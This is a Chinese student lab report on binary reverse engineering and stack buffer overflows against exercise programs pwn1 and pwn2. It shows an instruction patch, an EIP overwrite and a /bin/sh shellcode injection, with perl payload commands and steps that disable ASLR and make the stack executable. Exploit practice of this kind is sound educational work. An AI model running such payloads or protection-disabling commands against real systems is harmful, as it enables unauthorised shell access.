实验一 逆向与Bof基础

一、直接修改程序机器指令，改变程序执行流程

使用 objdump -d pwn1 对pwn1文件进行反汇编。

可知main函数跳转至foo函数，先要使main函数跳转至getshell函数，即修改返回地址。

首先使用vi查看器查看pwn1文件，并使用 %！xxd 转换为十六进制查看：

利用 “：e8 d7”查找到需要修改的目标；

将“e8 d7”改为“e8 c3”。

使用 %!xxd -r将文件转换回原文件，保存退出后，再次反汇编进行查看。

此时，main函数返回地址被修改至getshell函数。

二、通过构造输入参数，造成BOF攻击，改变程序执行流

先使用gdb对pwn2文件进行调试：

接下来对函数进行输入数据的测试，意图找到eip中存在4位数。

输入测试数据“1111111122222222333333334444444455555555”，并使用 info r 查看堆栈指令：

此时，eip中存放的是35353535，35是5的ascii码值。

再次输入测试数据“1111111122222222333333334444444412345678”，并使用 info r 查看：

此时eip中存放34333231，即4321。

使用 perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input 进行输入，再使用 xxd input 查看文件的十六进制：

三、注入Shellcode并执行

首先先做实验准备，先利用 apt-get install execstack 下载··execstack··。

输入命令：

execstack -s pwn1    //设置堆栈可执行

execstack -q pwn1    //查询文件的堆栈是否可执行

more /proc/sys/kernel/randomize_va_space

echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化

more /proc/sys/kernel/randomize_va_space

构造输入： perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode

其中，\x4\x3\x2\x1为溢出到eip的部分，也就是要修改为shellcode的首地址。

输入 (cat input_shellcode;cat) | ./pwn2 ，运行pwn2，然后打开顶一个终端，输入 ps -ef | grep pwn2 找到pwn2的进程号

利用进程号进入gdb调试：

输入 disassemble foo 查看foo的栈地址：

输入 break *0x080484a5 设置断点，并continue。

然后输入info r，查看栈的地址；

然后输入x/32x 0xffffd35c，并不断修改范围，寻找01020304；

之后在01020304的地址上加4，即d3 5c加4，使其覆盖之后的返回地址。

即填充 perl -e 'print "A" x 32;print "\x60\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode 指令。

至此，覆盖成功。

实验成功。